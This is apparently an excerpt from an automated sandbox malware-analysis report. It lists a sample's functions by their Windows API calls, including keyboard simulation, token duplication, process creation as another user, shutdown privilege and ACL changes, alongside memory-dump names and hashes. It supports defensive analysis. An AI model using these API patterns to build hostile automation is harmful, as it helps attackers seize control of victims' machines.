          • FindCloseChangeNotification.KERNELBASE(?,?,01156F2F), ref: 0113D9DD
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ChangeCloseFindNotification
          • String ID:
          • API String ID: 2591292051-0
          • Opcode ID: baebed7d41130560432c8ac767b2349f4ae7acaf3b30894ef6a3cc48464444ea
          • Instruction ID: a97eb4fc829adea67ad8b5fdd651c0351706aaf792b73ab885269b77b87a222c
          • Opcode Fuzzy Hash: baebed7d41130560432c8ac767b2349f4ae7acaf3b30894ef6a3cc48464444ea
          • Instruction Fuzzy Hash: FCE04EB4900B009A8B358F5EE444406FBF9AFE42213608E1FD5A6C2A68D3B4A1898F50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01173D3A, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
          Download Yara Rule
          APIs
          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,01156340,?,011B7AAC,00000003,0113E0B0,?,?,00000001), ref: 01173D58
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FileWrite
          • String ID:
          • API String ID: 3934441357-0
          • Opcode ID: c4552b9a76eea6eb87ea7353356b77fcb02d6661ee9da9f83d0c5c699e28ef17
          • Instruction ID: d92520b4f0fe4813c763dc6b16f0dbd135d596785d5f7d1eeeb6074c6a2b4369
          • Opcode Fuzzy Hash: c4552b9a76eea6eb87ea7353356b77fcb02d6661ee9da9f83d0c5c699e28ef17
          • Instruction Fuzzy Hash: A7E01276100318ABCB20DF98D844FDA77BCEF48760F00891AFA148B200C7B0FA848BE0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113E270, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
          Download Yara Rule
          APIs
          • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0113E288
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FilePointer
          • String ID:
          • API String ID: 973152223-0
          • Opcode ID: 61cde7c65e736d5b061b9db0c76eca51dc4098f0ddf2df9d88f60545a08fcc1d
          • Instruction ID: 6b6656f512f2bef8807a706cb7730a9001c55930b894ad7da2548d02d36ca8dc
          • Opcode Fuzzy Hash: 61cde7c65e736d5b061b9db0c76eca51dc4098f0ddf2df9d88f60545a08fcc1d
          • Instruction Fuzzy Hash: 0EE01279600208BFC708DFA4D885DAA777DE748201F008268FD01D7344D671BD5487A1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0116397D, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
          Download Yara Rule
          APIs
          • GetFileAttributesW.KERNELBASE(?), ref: 01163984
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: a0899f334f18a9c5e9033347cec07a4456d2bb9d0abf051a4dd838882bf8efd1
          • Instruction ID: 449c3c8e555350b28db1bbbfcc288fadf64ff8d2e56e894b1f116240cf25489c
          • Opcode Fuzzy Hash: a0899f334f18a9c5e9033347cec07a4456d2bb9d0abf051a4dd838882bf8efd1
          • Instruction Fuzzy Hash: F1C08C3506030856AE1C19ECA48D8E53F8C6942378B482A40FA7C875D1EB32B8E79B50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011417FA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
          Download Yara Rule
          APIs
          • _doexit.LIBCMT ref: 01141806
            • Part of subcall function 011416BA: __lock.LIBCMT ref: 011416C8
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __lock_doexit
          • String ID:
          • API String ID: 368792745-0
          • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
          • Instruction ID: 92e9e58cead7f43305c36e3fd25b20ea9e408e9608ca0710665c674c0d6817a5
          • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
          • Instruction Fuzzy Hash: EEB0923258020833DA242542AC06F063A1A97D0A64E280120BA0C191A0AAE2B9A18089
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011448E2, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __wfsopen
          • String ID:
          • API String ID: 197181222-0
          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
          • Instruction ID: a2d60672fa88fb667f8fb9f54b1019c1a97a88a058d8f959d64dab477dbfacb7
          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
          • Instruction Fuzzy Hash: 06C0927244024D77DF112A82EC02F4A3F5AABD0A64F048020FB1C19560AA73EA61D6D9
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A261D, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
          Download Yara Rule
          APIs
          • SHGetFolderPathW.SHELL32(00000000,00000007,00000000,00000000,?), ref: 011A262C
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FolderPath
          • String ID:
          • API String ID: 1514166925-0
          • Opcode ID: 8d13bf1a7827156fd87122c8f81648c123144ef56aeea56a8c84732b156d4fd7
          • Instruction ID: 69ac0c49516ae377151fe0e3594fd5275f99919a8430a4b9ddd3f6aa69886024
          • Opcode Fuzzy Hash: 8d13bf1a7827156fd87122c8f81648c123144ef56aeea56a8c84732b156d4fd7
          • Instruction Fuzzy Hash: 64C0923068C204FAFA384650CC8AF353A38B700B01F100091B309A80C0C3B478484A15
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          Function 011643FF, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
          Download Yara Rule
          APIs
          • GetForegroundWindow.USER32 ref: 01164407
          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0116442D
          • IsIconic.USER32 ref: 01164436
          • ShowWindow.USER32(?,00000009), ref: 01164443
          • SetForegroundWindow.USER32(?), ref: 01164451
          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 01164468
          • GetCurrentThreadId.KERNEL32 ref: 0116446C
          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0116447A
          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 01164489
          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0116448F
          • AttachThreadInput.USER32(00000000,?,00000001), ref: 01164498
          • SetForegroundWindow.USER32(00000000), ref: 0116449E
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 011644AD
          • keybd_event.USER32 ref: 011644B6
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 011644C4
          • keybd_event.USER32 ref: 011644CD
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 011644DB
          • keybd_event.USER32 ref: 011644E4
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 011644F2
          • keybd_event.USER32 ref: 011644FB
          • SetForegroundWindow.USER32(00000000), ref: 01164505
          • AttachThreadInput.USER32(00000000,?,00000000), ref: 01164526
          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0116452C
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
          • String ID: Shell_TrayWnd
          • API String ID: 2889586943-2988720461
          • Opcode ID: f961af5e1f19f045fba5acce4b0696bf3c27a083633129a6ceee7b58899b2b5a
          • Instruction ID: 84aed9ebe1ae3089fa13fcc100d770e0ad9b50a2aecca376932d3cf17da40c9e
          • Opcode Fuzzy Hash: f961af5e1f19f045fba5acce4b0696bf3c27a083633129a6ceee7b58899b2b5a
          • Instruction Fuzzy Hash: 604172727403087FE7385BA59C8AFBE7B6CDB44B11F10402AFA01EB5C5D7B068949BA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01176219, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 234processCOMMON
          Download Yara Rule
          APIs
          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 01176294
          • CloseHandle.KERNEL32(?), ref: 011762A6
          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 011762BE
          • GetProcessWindowStation.USER32 ref: 011762D7
          • SetProcessWindowStation.USER32(00000000), ref: 011762E1
          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 011762FD
          • _wcslen.LIBCMT ref: 0117639E
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _wcsncpy.LIBCMT ref: 011763C6
          • LoadUserProfileW.USERENV(?,00000020), ref: 011763DF
          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 011763F9
          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 01176428
          • UnloadUserProfile.USERENV(?,?), ref: 0117645B
          • CloseWindowStation.USER32(00000000), ref: 01176472
          • CloseDesktop.USER32(?), ref: 01176480
          • SetProcessWindowStation.USER32(?), ref: 0117648E
          • CloseHandle.KERNEL32(?), ref: 01176498
          • DestroyEnvironmentBlock.USERENV(?), ref: 011764AF
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
          • String ID: $default$winsta0
          • API String ID: 3324942560-1027155976
          • Opcode ID: e44e33ffcb889a4cf3736c91439c1bd96f03ad1dbc3f4495ea8e3cb1cadeb90f
          • Instruction ID: d8922bdc33d5091f7e062abd8e8794e5da497a6b53ae5d0a43aab67fecd2d62e
          • Opcode Fuzzy Hash: e44e33ffcb889a4cf3736c91439c1bd96f03ad1dbc3f4495ea8e3cb1cadeb90f
          • Instruction Fuzzy Hash: 79816470A00609ABEF18DFA8D889FEF7BB9AF44704F048119FA15A7384D774E945CB61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011633A3, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
          Download Yara Rule
          APIs
          • GetCurrentProcess.KERNEL32(00000028,?), ref: 011633B3
          • OpenProcessToken.ADVAPI32(00000000), ref: 011633BA
          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 011633CF
          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 011633F3
          • GetLastError.KERNEL32 ref: 011633F9
          • ExitWindowsEx.USER32(?,00000000), ref: 0116341C
          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 0116344B
          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0116345E
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
          • String ID: SeShutdownPrivilege
          • API String ID: 2938487562-3733053543
          • Opcode ID: e671871f461e959985cb5eba981a24d1e88ceb3f18a3cf3d52756a78a4516820
          • Instruction ID: 6fc15eddf67999257f960418647b0f415ad939074454336a0963f6f743cf692c
          • Opcode Fuzzy Hash: e671871f461e959985cb5eba981a24d1e88ceb3f18a3cf3d52756a78a4516820
          • Instruction Fuzzy Hash: E121F671745204ABF7288BA9EC8EFBABBACEB08701F144554FE1DD60C1DB766854C760
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117602A, Relevance: 16.7, APIs: 11, Instructions: 182COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01166DB5: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 01166DCF
            • Part of subcall function 01166DB5: GetLastError.KERNEL32(?,00000000,?), ref: 01166DD9
            • Part of subcall function 01166DB5: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 01166DFF
            • Part of subcall function 01166D81: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 01166D9C
          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01176090
          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 011760C4
          • GetLengthSid.ADVAPI32(?), ref: 011760D6
          • GetAce.ADVAPI32(?,00000000,?), ref: 01176113
          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0117612F
          • GetLengthSid.ADVAPI32(?), ref: 01176147
          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01176170
          • CopySid.ADVAPI32(00000000), ref: 01176177
          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 011761A9
          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 011761CB
          • SetUserObjectSecurity.USER32 ref: 011761DE
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
          • String ID:
          • API String ID: 1255039815-0
          • Opcode ID: d2685f438a511f4b7e842ac6cfc338dc559a4e80106fa67c5d820f782bc7c786
          • Instruction ID: fc77b76743a0e24cf0ac9f7e892b1b5a116e6055f61ddaf0ba88fe5013387e8e
          • Opcode Fuzzy Hash: d2685f438a511f4b7e842ac6cfc338dc559a4e80106fa67c5d820f782bc7c786
          • Instruction Fuzzy Hash: 1951A571900219ABEB28DFA5DC88EEF7B7DBF88700F048518F625A7241D735E649CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118A0FC, Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
          • String ID:
          • API String ID: 1737998785-0
          • Opcode ID: 64e2cf5684bd78218a922a4ffe61b9af5bae067d99e8e152dd7eaaf545d1d3bc
          • Instruction ID: a97aa46014d5ed32e046cf117102edba0af64ea039d1cda9666d6027916e4670
          • Opcode Fuzzy Hash: 64e2cf5684bd78218a922a4ffe61b9af5bae067d99e8e152dd7eaaf545d1d3bc
          • Instruction Fuzzy Hash: 6641F5726102069FD728EFA4EC88BAEB7B4FF54326F108569E915CB254DB71F940CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A557E, Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
          Download Yara Rule
          APIs
          • CreateToolhelp32Snapshot.KERNEL32 ref: 011A55C2
          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 011A55D2
          • __wsplitpath.LIBCMT ref: 011A55FE
            • Part of subcall function 0114392E: __wsplitpath_helper.LIBCMT ref: 01143970
          • _wcscat.LIBCMT ref: 011A5611
          • __wcsicoll.LIBCMT ref: 011A5635
          • Process32NextW.KERNEL32(00000000,?), ref: 011A5665
          • CloseHandle.KERNEL32(00000000), ref: 011A5674
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
          • String ID:
          • API String ID: 2547909840-0
          • Opcode ID: 776cb0e048734b06dbac933a2a3ff014dfebf7d87233c969c5a0aa8d933e3f09
          • Instruction ID: fd297a7d4a0377e69fd86ae8580c2429ef8809351b541b77ae9df3faafc04b08
          • Opcode Fuzzy Hash: 776cb0e048734b06dbac933a2a3ff014dfebf7d87233c969c5a0aa8d933e3f09
          • Instruction Fuzzy Hash: FD51A675900619ABDB19DF94CC85FDE77B8EF44704F508094EA09AB281E770AF44CFA4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119C06C, Relevance: 9.2, APIs: 6, Instructions: 231comCOMMON
          Download Yara Rule
          APIs
          • OleInitialize.OLE32(00000000), ref: 0119C0DC
          • _wcslen.LIBCMT ref: 0119C0EE
          • CreateBindCtx.OLE32(00000000,?), ref: 0119C198
          • MkParseDisplayName.OLE32(?,?,?,?), ref: 0119C1DE
            • Part of subcall function 01181AB8: GetLastError.KERNEL32(?,?,00000000), ref: 01181B16
            • Part of subcall function 01181AB8: VariantCopy.OLEAUT32(?,?), ref: 01181B6E
            • Part of subcall function 01181AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 01181B84
            • Part of subcall function 01181AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 01181B9D
            • Part of subcall function 01181AB8: VariantClear.OLEAUT32(-00000058), ref: 01181C17
          • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0119C284
          • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0119C29E
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
          • String ID:
          • API String ID: 2728119192-0
          • Opcode ID: e703aed9ca1cee5cd50ca504cd7d1a7e3a5d387a44b90a1a6b9f94a6bbb941a7
          • Instruction ID: c3168189c2890784d232a1ebdec288ac4ef1e8f62b59fcadc2697c4945192a45
          • Opcode Fuzzy Hash: e703aed9ca1cee5cd50ca504cd7d1a7e3a5d387a44b90a1a6b9f94a6bbb941a7
          • Instruction Fuzzy Hash: E6817F71618302AFD718EBA4C880F9BB7E8BFD8704F10491DF69597290E771E905CBA6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01182408, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128filesleepCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • FindFirstFileW.KERNEL32(?,?), ref: 01182455
          • Sleep.KERNEL32(?), ref: 01182481
          • FindNextFileW.KERNEL32(?,?), ref: 0118255F
          • FindClose.KERNEL32(?), ref: 01182575
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
          • String ID: *.*
          • API String ID: 2786137511-438819550
          • Opcode ID: 14c3ade614d356bf248ec1c209b6b0f2e56d631230df1e684e73822b05ef83db
          • Instruction ID: 420aff27eafa50fd39f22e5c2e08bcab856c5d1f4854b6829f8d535afa7cb1d1
          • Opcode Fuzzy Hash: 14c3ade614d356bf248ec1c209b6b0f2e56d631230df1e684e73822b05ef83db
          • Instruction Fuzzy Hash: 8F418F71A4021A9FDF1DEF68CC88AEE7BB4BF55204F148559E919A3240D730EA49CFA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01163321, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __wcsicollmouse_event
          • String ID: DOWN
          • API String ID: 1033544147-711622031
          • Opcode ID: 7837e7e2d2f52cc9b5b3487122530c26f2df06f5e82055a18722bfca4ffbffae
